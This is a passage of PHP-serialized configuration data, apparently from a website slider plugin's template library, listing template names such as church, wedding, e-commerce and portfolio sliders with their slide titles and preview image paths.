1\";s:3:\"img\";s:23:\"Church-About/slide1.jpg\";}}s:14:\"Church-Pastors\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"Church-Pastors/slide1.jpg\";}}s:20:\"Church-Photo-Gallery\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"Church-Photo-Gallery/slide1.jpg\";}}s:16:\"Church-Community\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"Church-Community/slide1.jpg\";}}s:13:\"Church-Sermon\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"Church-Sermon/slide1.jpg\";}}s:15:\"Church-Contacts\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"Church-Contacts/slide1.jpg\";}}s:13:\"Church-Footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"Church-Footer/slide1.jpg\";}}s:19:\"Church-Light-Header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"Church-Light-Header/slide1.jpg\";}}s:28:\"Church-Light-Upcoming-Events\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:39:\"Church-Light-Upcoming-Events/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:39:\"Church-Light-Upcoming-Events/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:39:\"Church-Light-Upcoming-Events/slide3.jpg\";}}s:18:\"Church-Light-About\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"Church-Light-About/slide1.jpg\";}}s:20:\"Church-Light-Pastors\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"Church-Light-Pastors/slide1.jpg\";}}s:26:\"Church-Light-Photo-Gallery\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:37:\"Church-Light-Photo-Gallery/slide1.jpg\";}}s:22:\"Church-Light-Community\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"Church-Light-Community/slide1.jpg\";}}s:19:\"Church-Light-Sermon\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"Church-Light-Sermon/slide1.jpg\";}}s:21:\"Church-Light-Contacts\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"Church-Light-Contacts/slide1.jpg\";}}s:19:\"Church-Light-Footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"Church-Light-Footer/slide1.jpg\";}}s:13:\"rockable-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"rockable-menu/slide1.jpg\";}}s:13:\"rockable-hero\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"rockable-hero/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:24:\"rockable-hero/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:24:\"rockable-hero/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:24:\"rockable-hero/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:24:\"rockable-hero/slide5.jpg\";}}s:15:\"rockable-lineup\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"rockable-lineup/slide1.jpg\";}}s:17:\"rockable-lineup-2\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"rockable-lineup-2/slide1.jpg\";}}s:22:\"rockable-gallery-title\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"rockable-gallery-title/slide1.jpg\";}}s:16:\"rockable-gallery\";a:7:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"rockable-gallery/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:27:\"rockable-gallery/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:27:\"rockable-gallery/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:27:\"rockable-gallery/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:27:\"rockable-gallery/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:27:\"rockable-gallery/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:27:\"rockable-gallery/slide7.jpg\";}}s:17:\"rockable-sponsors\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"rockable-sponsors/slide1.jpg\";}}s:15:\"rockable-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"rockable-footer/slide1.jpg\";}}s:21:\"rockable-detail-modal\";a:18:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:7;a:2:{s:5:\"title\";s:7:\"Slide 8\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:8;a:2:{s:5:\"title\";s:7:\"Slide 9\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:9;a:2:{s:5:\"title\";s:8:\"Slide 10\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:10;a:2:{s:5:\"title\";s:8:\"Slide 11\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:11;a:2:{s:5:\"title\";s:8:\"Slide 12\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:12;a:2:{s:5:\"title\";s:8:\"Slide 13\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:13;a:2:{s:5:\"title\";s:8:\"Slide 14\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:14;a:2:{s:5:\"title\";s:8:\"Slide 15\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:15;a:2:{s:5:\"title\";s:8:\"Slide 16\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:16;a:2:{s:5:\"title\";s:8:\"Slide 17\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:17;a:2:{s:5:\"title\";s:8:\"Slide 18\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}}s:23:\"rockable-detail-modal-2\";a:18:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:7;a:2:{s:5:\"title\";s:7:\"Slide 8\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:8;a:2:{s:5:\"title\";s:7:\"Slide 9\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:9;a:2:{s:5:\"title\";s:8:\"Slide 10\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:10;a:2:{s:5:\"title\";s:8:\"Slide 11\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:11;a:2:{s:5:\"title\";s:8:\"Slide 12\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:12;a:2:{s:5:\"title\";s:8:\"Slide 13\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:13;a:2:{s:5:\"title\";s:8:\"Slide 14\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:14;a:2:{s:5:\"title\";s:8:\"Slide 15\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:15;a:2:{s:5:\"title\";s:8:\"Slide 16\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:16;a:2:{s:5:\"title\";s:8:\"Slide 17\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:17;a:2:{s:5:\"title\";s:8:\"Slide 18\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}}s:27:\"real-estate-showcase-slider\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:38:\"Real-Estate-Showcase-Slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:38:\"Real-Estate-Showcase-Slider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:38:\"Real-Estate-Showcase-Slider/slide3.jpg\";}}s:16:\"isometric-slider\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"isometric-slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:27:\"isometric-slider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:27:\"isometric-slider/slide3.jpg\";}}s:17:\"E-Commerce-Slider\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"Shoes-Store-Slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:29:\"Shoes-Store-Slider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:29:\"Shoes-Store-Slider/slide3.jpg\";}}s:23:\"E-Commerce-Slider-Modal\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:35:\"Shoes-Store-Slider-Modal/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:35:\"Shoes-Store-Slider-Modal/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:35:\"Shoes-Store-Slider-Modal/slide3.jpg\";}}s:27:\"Woo-Commerce-Slider-Dynamic\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:37:\"Shoes-Store-Slider-Dynamic/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:37:\"Shoes-Store-Slider-Dynamic/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:37:\"Shoes-Store-Slider-Dynamic/slide3.jpg\";}}s:15:\"blooming-header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"blooming-header/slide1.jpg\";}}s:14:\"blooming-about\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"blooming-about/slide1.jpg\";}}s:18:\"blooming-portfolio\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"blooming-portfolio/slide1.jpg\";}}s:22:\"blooming-wedding-title\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"blooming-wedding-title/slide1.jpg\";}}s:25:\"blooming-wedding-carousel\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:36:\"blooming-wedding-carousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:36:\"blooming-wedding-carousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:36:\"blooming-wedding-carousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:36:\"blooming-wedding-carousel/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:36:\"blooming-wedding-carousel/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:36:\"blooming-wedding-carousel/slide6.jpg\";}}s:21:\"blooming-wedding-text\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"blooming-wedding-text/slide1.jpg\";}}s:22:\"blooming-parties-title\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"blooming-parties-title/slide1.jpg\";}}s:25:\"blooming-parties-carousel\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:36:\"blooming-parties-carousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:36:\"blooming-parties-carousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:36:\"blooming-parties-carousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:36:\"blooming-parties-carousel/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:36:\"blooming-parties-carousel/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:36:\"blooming-parties-carousel/slide6.jpg\";}}s:21:\"blooming-parties-text\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"blooming-parties-text/slide1.jpg\";}}s:22:\"blooming-funeral-title\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"blooming-funeral-title/slide1.jpg\";}}s:23:\"blooming-funeral-slider\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"blooming-funeral-slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:34:\"blooming-funeral-slider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:34:\"blooming-funeral-slider/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:34:\"blooming-funeral-slider/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:34:\"blooming-funeral-slider/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:34:\"blooming-funeral-slider/slide6.jpg\";}}s:21:\"blooming-funeral-text\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"blooming-funeral-text/slide1.jpg\";}}s:16:\"blooming-contact\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"blooming-contact/slide1.jpg\";}}s:13:\"particle-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"particle-hero/slide1.jpg\";}}s:17:\"bubble-morph-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"bubble-morph-hero/slide1.jpg\";}}s:13:\"parallax-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"parallax-hero/slide1.jpg\";}}s:10:\"video-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"video-hero/slide1.jpg\";}}s:14:\"ken-burns-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"ken-burns-hero/slide1.jpg\";}}s:21:\"basic-hero-collection\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"basic-hero-collection/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:32:\"basic-hero-collection/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:32:\"basic-hero-collection/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:32:\"basic-hero-collection/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:32:\"basic-hero-collection/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:32:\"basic-hero-collection/slide6.jpg\";}}s:19:\"launching-very-soon\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"launching-very-soon/slide1.jpg\";}}s:18:\"Under-Construction\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"Under-Construction/slide1.jpg\";}}s:15:\"Particle-Effect\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"Particle-Effect/slide1.jpg\";}}s:17:\"Particle-Effect-2\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"Particle-Effect-2/slide1.jpg\";}}s:10:\"stark-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"stark-menu/slide1.jpg\";}}s:12:\"stark-header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"stark-header/slide1.jpg\";}}s:13:\"stark-content\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"stark-content/slide1.jpg\";}}s:14:\"stark-carousel\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"stark-carousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:25:\"stark-carousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:25:\"stark-carousel/slide3.jpg\";}}s:15:\"stark-portfolio\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"stark-portfolio/slide1.jpg\";}}s:22:\"stark-portfolio-detail\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"stark-portfolio-detail/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:33:\"stark-portfolio-detail/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:33:\"stark-portfolio-detail/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:33:\"stark-portfolio-detail/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:33:\"stark-portfolio-detail/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:33:\"stark-portfolio-detail/slide6.jpg\";}}s:13:\"stark-contact\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"stark-contact/slide1.jpg\";}}s:12:\"stark-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"stark-footer/slide1.jpg\";}}s:16:\"stark-newsletter\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"stark-newsletter/slide1.jpg\";}}s:15:\"big-summer-sale\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"big-summer-sale/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:26:\"big-summer-sale/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:26:\"big-summer-sale/slide3.jpg\";}}s:18:\"traveller-carousel\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"traveller-carousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:29:\"traveller-carousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:29:\"traveller-carousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:29:\"traveller-carousel/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:29:\"traveller-carousel/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:29:\"traveller-carousel/slide6.jpg\";}}s:16:\"project-carousel\";a:7:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"project-carousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:27:\"project-carousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:27:\"project-carousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:27:\"project-carousel/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:27:\"project-carousel/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:27:\"project-carousel/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:27:\"project-carousel/slide7.jpg\";}}s:13:\"news-carousel\";a:8:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"news-carousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:24:\"news-carousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:24:\"news-carousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:24:\"news-carousel/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:24:\"news-carousel/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:24:\"news-carousel/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:24:\"news-carousel/slide7.jpg\";}i:7;a:2:{s:5:\"title\";s:7:\"Slide 8\";s:3:\"img\";s:24:\"news-carousel/slide8.jpg\";}}s:10:\"story-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"story-menu/slide1.jpg\";}}s:12:\"story-header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"story-header/slide1.jpg\";}}s:13:\"story-block-1\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"story-block-1/slide1.jpg\";}}s:15:\"story-content-1\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"story-content-1/slide1.jpg\";}}s:13:\"story-block-2\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"story-block-2/slide1.jpg\";}}s:13:\"story-block-3\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"story-block-3/slide1.jpg\";}}s:15:\"story-content-2\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"story-content-2/slide1.jpg\";}}s:13:\"story-block-4\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"story-block-4/slide1.jpg\";}}s:15:\"story-content-3\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"story-content-3/slide1.jpg\";}}s:12:\"mini-website\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"mini-website/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:23:\"mini-website/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:23:\"mini-website/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:23:\"mini-website/slide4.jpg\";}}s:13:\"food-delivery\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"food-delivery/slide1.jpg\";}}s:25:\"slider-with-illustrations\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:36:\"slider-with-illustrations/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:36:\"slider-with-illustrations/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:36:\"slider-with-illustrations/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:36:\"slider-with-illustrations/slide4.jpg\";}}s:8:\"zen-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:19:\"zen-menu/slide1.jpg\";}}s:10:\"zen-header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"zen-header/slide1.jpg\";}}s:9:\"zen-about\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:20:\"zen-about/slide1.jpg\";}}s:12:\"zen-features\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"zen-features/slide1.jpg\";}}s:9:\"zen-video\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:20:\"zen-video/slide1.jpg\";}}s:11:\"zen-pricing\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"zen-pricing/slide1.jpg\";}}s:22:\"zen-testimonials-title\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"zen-testimonials-title/slide1.jpg\";}}s:16:\"zen-testimonials\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"zen-testimonials/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:27:\"zen-testimonials/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:27:\"zen-testimonials/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:27:\"zen-testimonials/slide4.jpg\";}}s:10:\"zen-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"zen-footer/slide1.jpg\";}}s:17:\"Paintbrush-Effect\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"Paintbrush-Effect/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 